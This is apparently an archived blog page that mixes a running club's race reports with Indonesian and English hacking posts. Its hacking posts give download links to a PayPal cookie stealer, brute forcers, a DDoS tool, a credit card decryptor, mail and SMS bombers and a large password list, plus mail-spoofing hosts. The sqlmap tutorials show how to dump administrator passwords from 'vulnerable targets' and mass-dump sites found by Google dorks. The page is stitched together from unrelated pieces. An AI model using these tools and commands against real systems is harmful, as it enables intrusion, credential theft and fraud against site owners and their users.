May 2014

Sunday 25 May 2014

Mike Vs. Dave: Team Edition

Sigit Chaw 12:12

As many of you already know, Mike and Dave are going head-to-head in the inaugural Battle of Run Waterloo.

After stage 1 (2014 Re-Fridgee-8er 8K), Dave has a lead of just over 1 minute!

That being said, the race is far from over. In recent weeks, Mike beat Dave by approximately 2 minutes in a 7-Miler. The next stage, the Waterloo 10K Classic, may very well be the deciding stage of this race.

To make things even MORE interesting, not only will Mike and Dave be racing as individuals, but they will be racing as captains of their own H+P teams.

Team Mike vs. Team Dave
In the team edition of Mike Vs. Dave, the premise is simple: the team with the fastest average finishing time in the 10K wins. Here are the details:

Only the top 5 on each team will count in the average time calculation
Each team will be selected in a draft format. A coin toss will decide who gets first pick. The individual with the 2nd pick will also get the 3rd pick. Then the two captains will alternate picks until their teams are complete.
The results of the draft will be LIVE TWEETED at 9:00pm on June 2nd! Make sure to watch our twitter feed to see how it all unfolds!

Other H+P-ers in the Battle:

We can't forget the rest of the team participating in the battle. Right now we have a number of athletes fighting for spots on the OA and their AG podiums.

After stage one, we have six runners (Sean, Dave, Mike, Greg, Brendan, Pat) all in the top 11 OA.

Vicki Z is also in contention for the OA podium on the women's side as she now sits in 4th OA.

H+P Racing: Somewhere around May 25th, 2014!

Sigit Chaw 11:35

With our next big, collective team focus still a few weeks away, the team was spread out throughout a number of different races this weekend (and last). Here is a summary of how we did!

Sulphur Springs

100M
Steve Parke had an amazing 100M! He came in with a time of just over 18 hours. The was good enough for 2nd OA, and put him in front of 3rd place by almost 1.5 hours!

25K:
Helen had an outstanding race. She crushed the technical 25K run in 2:17, taking 6 minutes off her time from last year!
Linda also had a great race. She finished with an outstanding time of 2:26!

10K:
Dave Rutherford crushed the very technical 10K course in a time of well under 39minutes. This allowed him to comfortably win his AG, and place 4th OA.

Woodstock Triathlon:
Luke had an outstanding race. He finished the sprint triathlon in a time of 1:05. This put him in second place in the very competitive 40-44AG.

Ohio TTT:
Graham Dunn DESTROYED this race. If you don't know what it is: basically you race triathlons all weekend long. Friday is a short sprint tri, Saturday you race TWO separate Olympic Triathlons, and then Sunday you race the Half Ironman. Mr. Dunn managed to finish in a very impressive 16th place OA, and achieved a personal best in the event by 45 minutes!

Buffalo Marathon:
Vicki Z had an amazing break-through race. She crushed the marathon, finishing with a time of 3:32. This was a 19 minute personal best, and brought her in ranked 3rd in her AG!

Toronto Women's Half Marathon:
Tracy made some last minute arrangements, and ran the half in a very respectable 1:47! This brought in 10th place in her AG, nice work!

Wednesday 21 May 2014

Tool Hacking ( My Collection )

Sigit Chaw 13:17

Ok bro pada pagi hari ini saya akan berbagi beberapa koleksi Tool Hacking saya, silahkan di ambil..

Gunakan secara bijak.. Don't Attack Indonesian Site.

http://cur.lv/9yw8l > perl exploiter script
http://cur.lv/9yw9i > PayPal XSS + Cookie Stealer Exploit
http://cur.lv/9ywaf > PHP encoder
http://cur.lv/9ywd5 > Ftp Bruteforce Tool [Python]
http://cur.lv/9ywh4 > Com_livechat Exploit Checker[perl]
http://cur.lv/9ywpe > Damn Vulnerable Web App
http://cur.lv/9ywue > 14 million password
http://cur.lv/9yx23 > admin Scanner php script
http://cur.lv/9yx64 > AnonGhost DDOS
http://cur.lv/9yx73 > SQL Sentinel
http://cur.lv/9yxj6 > Fake Mailer ( php script )
http://cur.lv/9yxmq > Bing url Grabberl ( python )
http://cur.lv/9yxnh > ssh port finder
http://cur.lv/9yxos > WHMCS Credit Card Decrypt
http://cur.lv/9yxqj > netcat (php)
http://cur.lv/9yxwn > DezFake
http://cur.lv/9yy15 > [PHP PRİV8] Multiple Cpanel Username Scraper + Brute Forcer / Multithread
http://cur.lv/9yy2c > poizon.rar
http://cur.lv/9yy2i > MaxISploit
http://cur.lv/9yy4z > [PyTh0n] Joomla JCE server scanner
http://cur.lv/9yyem > sms boomber
http://cur.lv/9yyfh > mail bomber
http://cur.lv/9yygj > exploit scanner
http://cur.lv/9yyi8 > script php for get IP adresse
http://cur.lv/9yyun > Firefox Hacker
http://cur.lv/9yyyn > wp.py
http://cur.lv/9yz0e > Blind sql scanner
http://cur.lv/9yz0i > sql scanner (python)

Semoga bermanfaat salam 1mp4ct_404
OTHER

Friday 16 May 2014

Usage: python ./sqlmap [options]

Sigit Chaw 18:27

Usage: python ./sqlmap [options]

Options:

-h, --help Show basic help message and exit

-hh Show advanced help message and exit

--version Show program's version number and exit

-v VERBOSE Verbosity level: 0-6 (default 1)

Target:

At least one of these options has to be provided to set the target(s)

-d DIRECT Direct connection to the database

-u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1")

-l LOGFILE Parse targets from Burp or WebScarab proxy logs

-m BULKFILE Scan multiple targets enlisted in a given textual file

-r REQUESTFILE Load HTTP request from a file

-g GOOGLEDORK Process Google dork results as target URLs

-c CONFIGFILE Load options from a configuration INI file

Request:

These options can be used to specify how to connect to the target URL

--data=DATA Data string to be sent through POST

--param-del=PDEL Character used for splitting parameter values

--cookie=COOKIE HTTP Cookie header

--cookie-del=CDEL Character used for splitting cookie values

--load-cookies=L.. File containing cookies in Netscape/wget format

--drop-set-cookie Ignore Set-Cookie header from response

--user-agent=AGENT HTTP User-Agent header

--random-agent Use randomly selected HTTP User-Agent header

--host=HOST HTTP Host header

--referer=REFERER HTTP Referer header

--headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")

--auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or Cert)

--auth-cred=AUTH.. HTTP authentication credentials (name:password)

--auth-cert=AUTH.. HTTP authentication certificate (key_file,cert_file)

--proxy=PROXY Use a proxy to connect to the target URL

--proxy-cred=PRO.. Proxy authentication credentials (name:password)

--proxy-file=PRO.. Load proxy list from a file

--ignore-proxy Ignore system default proxy settings

--tor Use Tor anonymity network

--tor-port=TORPORT Set Tor proxy port other than default

--tor-type=TORTYPE Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)

--check-tor Check to see if Tor is used properly

--delay=DELAY Delay in seconds between each HTTP request

--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)

--retries=RETRIES Retries when the connection timeouts (default 3)

--randomize=RPARAM Randomly change value for given parameter(s)

--safe-url=SAFURL URL address to visit frequently during testing

--safe-freq=SAFREQ Test requests between two visits to a given safe URL

--skip-urlencode Skip URL encoding of payload data

--force-ssl Force usage of SSL/HTTPS

--hpp Use HTTP parameter pollution

--eval=EVALCODE Evaluate provided Python code before the request (e.g.

"import hashlib;id2=hashlib.md5(id).hexdigest()")

Optimization:

These options can be used to optimize the performance of sqlmap

-o Turn on all optimization switches

--predict-output Predict common queries output

--keep-alive Use persistent HTTP(s) connections

--null-connection Retrieve page length without actual HTTP response body

--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)

Injection:

These options can be used to specify which parameters to test for,

provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)

--skip=SKIP Skip testing for given parameter(s)

--dbms=DBMS Force back-end DBMS to this value

--dbms-cred=DBMS.. DBMS authentication credentials (user:password)

--os=OS Force back-end DBMS operating system to this value

--invalid-bignum Use big numbers for invalidating values

--invalid-logical Use logical operations for invalidating values

--no-cast Turn off payload casting mechanism

--no-escape Turn off string escaping mechanism

--prefix=PREFIX Injection payload prefix string

--suffix=SUFFIX Injection payload suffix string

--tamper=TAMPER Use given script(s) for tampering injection data

Detection:

These options can be used to customize the detection phase

--level=LEVEL Level of tests to perform (1-5, default 1)

--risk=RISK Risk of tests to perform (0-3, default 1)

--string=STRING String to match when query is evaluated to True

--not-string=NOT.. String to match when query is evaluated to False

--regexp=REGEXP Regexp to match when query is evaluated to True

--code=CODE HTTP code to match when query is evaluated to True

--text-only Compare pages based only on the textual content

--titles Compare pages based only on their titles

Techniques:

These options can be used to tweak testing of specific SQL injection

techniques

--technique=TECH SQL injection techniques to use (default "BEUSTQ")

--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)

--union-cols=UCOLS Range of columns to test for UNION query SQL injection

--union-char=UCHAR Character to use for bruteforcing number of columns

--union-from=UFROM Table to use in FROM part of UNION query SQL injection

--dns-domain=DNS.. Domain name used for DNS exfiltration attack

--second-order=S.. Resulting page URL searched for second-order response

Fingerprint:

-f, --fingerprint Perform an extensive DBMS version fingerprint

Enumeration:

These options can be used to enumerate the back-end database

management system information, structure and data contained in the

tables. Moreover you can run your own SQL statements

-a, --all Retrieve everything

-b, --banner Retrieve DBMS banner

--current-user Retrieve DBMS current user

--current-db Retrieve DBMS current database

--hostname Retrieve DBMS server hostname

--is-dba Detect if the DBMS current user is DBA

--users Enumerate DBMS users

--passwords Enumerate DBMS users password hashes

--privileges Enumerate DBMS users privileges

--roles Enumerate DBMS users roles

--dbs Enumerate DBMS databases

--tables Enumerate DBMS database tables

--columns Enumerate DBMS database table columns

--schema Enumerate DBMS schema

--count Retrieve number of entries for table(s)

--dump Dump DBMS database table entries

--dump-all Dump all DBMS databases tables entries

--search Search column(s), table(s) and/or database name(s)

--comments Retrieve DBMS comments

-D DB DBMS database to enumerate

-T TBL DBMS database table to enumerate

-C COL DBMS database table column to enumerate

-U USER DBMS user to enumerate

--exclude-sysdbs Exclude DBMS system databases when enumerating tables

--start=LIMITSTART First query output entry to retrieve

--stop=LIMITSTOP Last query output entry to retrieve

--first=FIRSTCHAR First query output word character to retrieve

--last=LASTCHAR Last query output word character to retrieve

--sql-query=QUERY SQL statement to be executed

--sql-shell Prompt for an interactive SQL shell

--sql-file=SQLFILE Execute SQL statements from given file(s)

Brute force:

These options can be used to run brute force checks

--common-tables Check existence of common tables

--common-columns Check existence of common columns

User-defined function injection:

These options can be used to create custom user-defined functions

--udf-inject Inject custom user-defined functions

--shared-lib=SHLIB Local path of the shared library

File system access:

These options can be used to access the back-end database management

system underlying file system

--file-read=RFILE Read a file from the back-end DBMS file system

--file-write=WFILE Write a local file on the back-end DBMS file system

--file-dest=DFILE Back-end DBMS absolute filepath to write to

Operating system access:

These options can be used to access the back-end database management

system underlying operating system

--os-cmd=OSCMD Execute an operating system command

--os-shell Prompt for an interactive operating system shell

--os-pwn Prompt for an OOB shell, meterpreter or VNC

--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC

--os-bof Stored procedure buffer overflow exploitation

--priv-esc Database process user privilege escalation

--msf-path=MSFPATH Local path where Metasploit Framework is installed

--tmp-path=TMPPATH Remote absolute path of temporary files directory

Windows registry access:

These options can be used to access the back-end database management

system Windows registry

--reg-read Read a Windows registry key value

--reg-add Write a Windows registry key value data

--reg-del Delete a Windows registry key value

--reg-key=REGKEY Windows registry key

--reg-value=REGVAL Windows registry key value

--reg-data=REGDATA Windows registry key value data

--reg-type=REGTYPE Windows registry key value type

General:

These options can be used to set some general working parameters

-s SESSIONFILE Load session from a stored (.sqlite) file

-t TRAFFICFILE Log all HTTP traffic into a textual file

--batch Never ask for user input, use the default behaviour

--charset=CHARSET Force character encoding used for data retrieval

--crawl=CRAWLDEPTH Crawl the website starting from the target URL

--csv-del=CSVDEL Delimiting character used in CSV output (default ",")

--dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE)

--eta Display for each output the estimated time of arrival

--flush-session Flush session files for current target

--forms Parse and test forms on target URL

--fresh-queries Ignore query results stored in session file

--hex Use DBMS hex function(s) for data retrieval

--output-dir=ODIR Custom output directory path

--parse-errors Parse and display DBMS error messages from responses

--pivot-column=P.. Pivot column name

--save Save options to a configuration INI file

--scope=SCOPE Regexp to filter targets from provided proxy log

--test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW)

--update Update sqlmap

Miscellaneous:

-z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU")

--alert=ALERT Run shell command(s) when SQL injection is found

--answers=ANSWERS Set question answers (e.g. "quit=N,follow=N")

--beep Make a beep sound when SQL injection is found

--check-waf Heuristically check for WAF/IPS/IDS protection

--cleanup Clean up the DBMS from sqlmap specific UDF and tables

--dependencies Check for missing (non-core) sqlmap dependencies

--disable-coloring Disable console output coloring

--gpage=GOOGLEPAGE Use Google dork results from specified page number

--identify-waf Make a through testing for a WAF/IPS/IDS protection

--mobile Imitate smartphone through HTTP User-Agent header

--page-rank Display page rank (PR) for Google dork results

--purge-output Safely remove all content from output directory

--smart Conduct through tests only if positive heuristic(s)

--wizard Simple wizard interface for beginner users

Python

SQLMAP Basic Introduction and Tutorial

Sigit Chaw 17:58

There are times when manual efforts just wont work or you plain dont have the skills and other famous tools like Havij dont seem to do the trick either. I experienced one of these times recently and it lead me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to timing method sucking and I dont have skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now because there is no GUI for this and I dont think there ever will be. If you really want to hack you need to get familiar with it so why not start now. Let's begin...

There is no need to waste time with $hitcash and other download sites. For a stable and virus free copy just get from the official site here: http://sqlmap.sourceforge.net/
             Direct to Download Page: http://sourceforge.net/projects/sqlmap/files/sqlmap/

You will simply extract this to the desired folder you want to run and use it from. As mentioned this is a command line tool, NO GUI. If you want to add it to your path variable so you can run it from anywhere the command prompt opens by following these simple steps:

1) Right click on Computer and choose Properties option
2) In the System window click on Advanced system settings in the left pane
3) In the System Properties window select Advanced tab and click on Environment Variables
4) In the Environment Variables window you will notice two columns User variables for a username and System variables - we need the user variable to the PATH so it knows where to open the program wherever we decide to open CMD from
5) Now to add a PATH to the User variable, highlight PATH and click on New… button. In the New User Variable dialog box type the Variable name and Variable value and click OK button. If you are unsure you can choose to edit the PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFULL, now just add path to sqlmap.exe to the end and your done, hit OK and save.
     5a) To remove a User variable click on the required User variable and then click on Delete button
     5b) To edit a User variable click on Edit… button. In the Edit User Variable dialog box
     edit the Variable name and Variable value and click OK button

NOTE: you can skip the path variable part if you want but then you must be in the folder to run it from command line (I am lazy and dont like to navigate so I like to set it and forget it)

OK now you should be ready to get started...open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and put them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows, you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side.

I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. we will use the '-u' option to define our target site, like this:

EX: sqlmap -u http://site.com/example.php?id=1

Results...PHP 5.2.14, Apache 2.2.17, MySQL 5
this will perform a basic run at the target to test for injection, simply providing basic overview info. We can use the '-f' parameter to get some more specific information from our target, like this:

EX: sqlmap -u http://site.com/example.php?id=1 -f

Results are not too much more than previous (you get column count or vulnerable column if you pay close attention to info retrieved as well as specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesnt really tell us a lot so lets grab the site banner to see what it can tell us as well as some other useful info from the Database itself by changing up the command and adding a few more paramaters, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs
Results:

NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you dont get the rest. For this reason I usually start with the above command and then start to change from there to get more info...

-f = Back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
              comment injection fingerprint: MySQL 5.1.00
              banner parsing fingerprint: MySQL 5.0.92
-b = banner:    '5.0.92-community'
--current-user = read from file 'C:\sqlmap-0.8_exe\output\site.com\session': user@localhost
--current-db = same as above, reads from session file created for scan but shows current database
--is-dba = same as above, reads from session file created for scan but shows if current user is DBA: 'TRUE' or 'False'
--users = same as above, reads from session file created for scan but shows number of database users and usernames
--dbs = same as above, reads from session file created for scan but shows ALL of the databases available, not just current
current user:    'user@localhost'
current database: database1
system users [1]: 'user'@'localhost'
current user is DBA:    'False'
vailable databases [5]:
[*] information_schema
[*] database1
[*] database2
[*] database3
[*] database4

This pretty much gets you set up with the basic info, you can go a step further and add the '--passwords' to the end of the command to try and extract the users passwords fro database users if they are available. This is not always effective though (i.e. no MySQL table) which is why it is best to add after the basics or at the end of your recon session, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs --passwords

OR by itself following our recon command like this:

EX: sqlmap -u http://site.com/example.php?id=1 --passwords

You can also check user priveleges '--priveleges' to check user priveleges as well as roles '--role'..., but what if you want to dig deeper into the Database(s) to find more info, no problem....let's keep going and extract all of the table names and columns...

Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this:

EX: sqlmap -u http://site.com/example.php?id=1 --tables -D database1

Results....it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen.

The results would look something like this:
[16:10:05] [INFO] fetching tables for database 'database1'
[16:10:05] [INFO] fetching number of tables for database 'database1'
[16:10:05] [INFO] retrieved: 13
[16:10:16] [INFO] retrieved: access
[16:10:53] [INFO] retrieved: action
[16:11:40] [INFO] retrieved: ad
[16:11:55] [INFO] retrieved: adcriteria
[16:13:02] [INFO] retrieved: adminhelp
[16:13:56] [INFO] retrieved: administrator
[16:15:14] [INFO] retrieved: adminlog
[16:16:00] [INFO] retrieved: adminmessage
[16:17:26] [INFO] retrieved: bbcode
[16:18:26] [INFO] retrieved: config
[16:19:26] [INFO] retrieved: db_users
[16:20:26] [INFO] retrieved: users
[16:21:26] [INFO] retrieved: etc
Database: database1
[13 tables]
+-----------------+
| access              |
| action              |
| ad                    |
| adcriteria         |
| adminhelp        |
| administrator   |
| adminlog          |
| adminmessage |
| bbcode            |
| config              |
| db_users          |
| users                |
| etc                  |
+-----------------+
....and so on until it is done finding all of the tables for the database you specified with the '-D database1' paramater earlier...and now we find the columns for the tables found above...

EX: sqlmap -u http://site.com/example.php?id=1 --columns -D database1 -T administrator

Results....remember you can check your logs in "output" folder...The results would look something like this:
[16:30:05] [INFO] fetching columns for table 'administrator' on database 'database1'
[16:33:05] [INFO] fetching number of columns for table 'administrator' on database 'database1'
[16:36:05] [INFO] retrieved: 3
[16:39:16] [INFO] retrieved: user
[16:45:53] [INFO] retrieved: pass
[16:46:40] [INFO] retrieved: id
[16:49:26] [INFO] retrieved: etc
Database: database1
Table: administrator
[3 Columns]
+-----------+----------------+
| Column    |     Type         |
+-----------+----------------+
| user        | varchar(250) |
| pass         | varchar(250) |
| ID            | int(11)           |
| etc           | varchar(100) |
+-----------+----------------+
....and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' paramaters earlier...BUT no you may be asking yourself how do we get that precious data out of there?

Like this:
EX: sqlmap -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C user,pass,id

Results....remember you can check your logs in "output" folder...The results would look something like this:
[18:51:57] [INFO] fetching columns 'user, pass, id' entries for table
'administrator' on database 'database1'
[18:51:57] [INFO] fetching number of columns 'user, pass, id' entries for table 'administrator' on database 'database1'
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 1
[18:51:57] [INFO] retrieved: IhazYOURpassWZORD
[18:52:52] [INFO] retrieved: admin
[18:53:34] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:53:34] [INFO] retrieved: IhazYOURpassWZORDtoo
[18:54:34] [INFO] retrieved: JohnDoe
Database: database1
Table: administrators
[2 entries]
+-----+---------------------------------+------------+
|   ID |                Password              |    user      |
+-----+---------------------------------+------------+
| 1      | IhazYOURpassWORD     |    admin    |
| 2    | IhazYOURpassWORDtoo | JohnDoe |
+-----+---------------------------------+------------+
[18:55:14] [INFO] Table 'database1.administrator' dumped to CSV file 'C:\sqlmap-0.8_e
xe\output\www.site.com\dump\database1\administrator.csv'
[18:55:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.8_exe\out
put\www.site.com'
That sums up our basic introduction to SQLMAP. Ideas for next series...SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of Metasploit to the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series...

sumber: http://kaoticcreations.blogspot.com/2011/04/sqlmap-basic-introduction-and-tutorial.html
SQLMAP

Mengatasi Modem Error

Sigit Chaw 17:20

berikut masalah eror yang sering timbul pada modem jenis ini:

    device has been disconnected or is unavailable
    pada saat kita instal sofware drivernya berjalan dengan lancar, tapi setelah di instal timbul pesan eror “device has been disconnected or is unavailable” coba re-instal lagi timbul juga pesan eror yang sama, solusi permasalahan ini:

        Klik kanan my computer – properties – hardware – device manager
        Klik pilihan Universal serial bus controller
        Cari USB mass storage kemudian klik kanan – uninstal
        dalam hitungan detik anda akan melihat komputer akan menginstal sendiri software mobile partner,tunggu sampai selesai. maka problem terselesaikan :)

    Eror 711 di windows 7
    Masalah ini sering terjadi di win 7 disaat kita akan menggunakan internet dengan coneksi modem, pesan erornya “Error 711: The operation could not finish because it could not start the Remote Access Connection Manager service in time. Please try the operation again” berikut solusi dari permasalahan ini:

        Masuk ke Services, dengan cara ctrl + R kemudian ketikkan msconfig setelah itu klik pada services kemudian disable all, setelah itu klik OK kemudian restart komputer / PC anda.
        Setelah restart, masuk ke C:\Windows\System32\LogFiles\WMI , kemudian di dalam nya terdapat folder RtBackup, hapus folder tersebut.
        Kemudian yang harus anda lakukan adalah mengaktifkan kembali services yg tadi di disable, masuk lagi ke tab services, caranya sama dengan langkah nomor 1, kemudian OK, restart kembali PC / laptop anda.
    Eror 720 Dial up conection
    masalah ini sering terjadi saat mau coneksi dial up, signal ok, kartu oke, tp saat coneck muncul pesan eror “Error 702: A connection to the remote computer could not be established…” problem ini biasanya di sebabkan oleh file RAS yang terblokir (remote access service) di (c”\windows\system32\ras), dan juga di sebabkan oleh kesalahan pada konfirgurasi protocol PPP, untuk mengatasinya kita bisa langsung mereset TCP/IP melalui CMD dengan cara sbb:

        cabut dulu usb modem anda
        Buka command prompt (cmd) : Start > Run > Ketik CMD > Enter
        Masukan perintah “netsh int ip reset c:\resetlog.txt” (tanpa petik) > enter
        restar computer/ laptop anda
        coba coneck kembali.. good lucky :)
    Signal tidak muncul
    ada beberapa penyebab jika modem huawei anda tidak menampilkan signal di bar indikator signal, malah pertama signal tidak muncul karna windows kehilangan driver dari modem, bisa dikarenakan virus atau anti virus yang otomatis meremove driver yang terinstal di laptop/computer anda. dan jika ini terjadi, anda masih bisa mengatasinya dengan cara sbb:

        download petunjuknya disiniInstall driver manually on Win 7 OS
        download drivernya disini Windows Driver for(3.09.00.00) { tp ingat ya untuk file ini format filenya harus di ubah menjadi “zip” klo gak bisa baca postingannya disini}

untuk erorr yang lain yang anda ketahui, anda bisa share dan berbagi disini .. :) :) OTHER

Trik Windows LogOn

Sigit Chaw 17:17

Membuat Tampilan Berbeda Pada Jendela Logon

HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/ThemeManager

Klik ganda ColorName dan masukkan teks Metallic pada Value Data.

2. Menampilkan Administrator Di Welcome Screen

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Buat sebuah DWORD Value baru dan beri nama Administrator.
Klik ganda Administrator dan masukkan angka 1 pada Value Data.

3. Mengubah Jendela Logon

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Buat sebuah DWORD Value baru dan beri nama LogonType.

Klik ganda LogonType dan masukkan value sebagai berikut pada Value Data:
0 > Classic Mode
1 > Welcome Screen

4. Mengubah Wallpaper Di Jendela Logon

HKEY_USERS\.DEFAULT\Control Panel\Desktop

Ubah nilai key Wallpaper dan masukkan path tempat lokasi file bitmap (.bmp)
yang diinginkan. (contoh: D:/Documents/Wallpaper.bmp)
Mengubah Wallpaper Di Jendela Logon

HKEY_USERS\.DEFAULT\Control Panel\Desktop

Ubah nilai key Wallpaper dan masukkan path tempat lokasi file bitmap (.bmp)
yang diinginkan. (contoh: D:/Documents/Wallpaper.bmp)

5. Kotak Dialog Sebelum Logon

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Klik ganda LegalNoticeCaption dan masukkan input teks judul yang diinginkan

(contoh: WARNING). Klik ganda LegalNoticeText dan masukkan input teks yang
diinginkan (contoh: Do Not Attempt to Logon to this system unless you are an authorized user).

6. Kustomisasi Windows Logon Dan Judul Dialog Keamanan

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Buat sebuah String Value baru dan beri nama Welcome.

Klik ganda Welcome dan masukkan input teks yang diinginkan.

7. Menyembunyikan Usernames Dari Jendela Logon

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Buat sebuah DWORD Value baru dan beri nama sesuai dengan username yang diinginkan.
Klik ganda pada value tersebut dan masukkan angka 0 pada Value Data.

Semoga Bermanfaat.

OTHER

Server Spoffing

Sigit Chaw 17:16

Di bawah adalah server spoffing yahoo,gmail.dan hotmail

n.mx.mail.yahoo.com
m.mx.mail.yahoo.com
gmail-smtp-in.l.google.com
mx4.hotmail.com OTHER

Daftar Layanan SMTP di Indonesia

Sigit Chaw 17:15

Berikut ini adalah beberapa daftar layanan SMTP di Indonesia,

Speedy Telkom :
coba salah satu :
smtp.telkom.net
smtp.telkomnet.com

Telkomsel (Halo/Simpati/Kartu As)
mail.telkomsel.com

Indosat (pilih salah satu)
smtp.indosat-m3.net
mail.indosat-m3.net
jktmail2.indosat-m3.net
hedwig.satelindogprs.com
smtp.indosat.net.id

XL
xlsmtp.xl.net.id

Kartu 3 (three)
coba salah satu :
smtp.three.co.id
mail.three.co.id

Kartu INDOSAT IM2 :
POP : pop.indosat.net.id
SMTP : smtp.indosat.net.id
setting lengkap :
http://www.indosatm2.com/index.php/support/settings

netZAP
pop : pop.net-zap.com
smtp : smtp.net-zap.com
untuk lebih detail setting email-client :
http://www.net-zap.com/downloads/email_client_setting.pdf

Indonet
pop : pop.indo.net.id
smtp : smtp.indo.net.id
http://www.indo.net.id/

biznet
SMTP: smtp.biz.net.id
POP3: pop.biz.net.id
http://www.biz.net.id

radnet
SMTP Server : smtp.rad.net.id (Port : 25)
POP3 Server : pop.rad.net.id (Port : 110)
Primary DNS : 202.154.1.2
Secondary DNS : 202.154.3.2
Proxy Server : proxy.rad.net.id Port : 8080
http://www.rad.net.id OTHER

Setting Modem Semua Kartu

Sigit Chaw 17:14

Setting Modem Vodafone Untuk Kartu XL Unlimited :
Profile Name : XL (Bisa Yang lain karena hanya nama profile)
APN : Pilih Static dan isikan : xlunlimited
Access Number : *99#
User Name : (Kosongkan Saja)
Password : (Kosongkan Saja)

Setting Modem Vodafone Untuk Kartu 3 (three) :
Profile Name : 3data (Terserah anda)
APN : Pilih Dynamic
Access Number : *99#
User Name : 3data
Password : 3data

Setting Modem Vodafone Untuk Kartu AXIS :
Profile Name : Axis
APN : Pilih Static dan isikan : axis
Access Number : *99#
User Name : (Kosongkan Saja)
Password : (Kosongkan Saja)

Setting Modem Vodafone Untuk Kartu IM3 :
Profile Name : IM3
APN : Pilih Static dan isikan : www.indosat-m3.net
Access Number : *99#
User Name : (Kosongkan Saja)
Password : (Kosongkan Saja) OTHER

SQLMap - Basic / Intermediate usage

Sigit Chaw 17:08

So I've recently been interested in web security a bit more and while learning more about SQL injections I came across a tool I found handy. This is sqlmap, an SQL Injection and Database takeover tool. Sqlmap can handle a variety of database management systems such as MS SQL, MYSQL, Oracle and so on. It supports five injection techniques - boolean-based blind, time-based blind, error-based, UNION query and stacked queries. It can retrieve tables, along with its contents. It also has a built in hash cracking function to attempt to crack known hash's with a dictionary based attack. It has many other fun features such as metasploit interaction for privilege escalation and utilization of google dorks, which I will give an example of below.

This command with use a given google dork and attempt to dump all available information from all the results on the first page of google.

python sqlmap.py --dump-all -g "inurl:prodID=3030"

Now this could come in handy when pentesting because you could use google dorks to focus in on the target and spider it for specific pages or just more possible vulnerabilities. Or just use it for the general dork fun. You can also choose a different page for the google results as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an sql injection is found we can will add the following beep command.

python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep

Another possibility when targeting a specific target in a pentest you can do something like this;

python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords

You can also specify certain things to extract to save time which I'm sure you'll see. To start off we will fingerprint the system to get an idea of what we're dealing with. Than we will find the databases and tables with verbosity and proceed to issue another command to extract the current user and password hash's.

python sqlmap.py -u www.example.com/shop/prodID=777 -f

If all's we'll proceed to issue the following commands, this will automate the process (--batch) and show us the estimated time (--eta);

python sqlmap.py -u www.example.com/shop/prodID=777 --dbs --tables -v 6 --batch --eta

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB --tables --batch --eta

Now we know the example DBase have a table named ex_admin, so we'll pull that tables columns.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump -batch --eta

If we wanted to do this via a proxy, you can use the --proxy flag as I will show you. We'll assume you've got tor and polipo up and running.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123

You can also brute force common tables and column with the --common-tables feature abd play around with the OS Takeover portion of it with --os-pwn (which utilizes metasploit) and --os-shell. SQLMAP

Kumpulan Password List

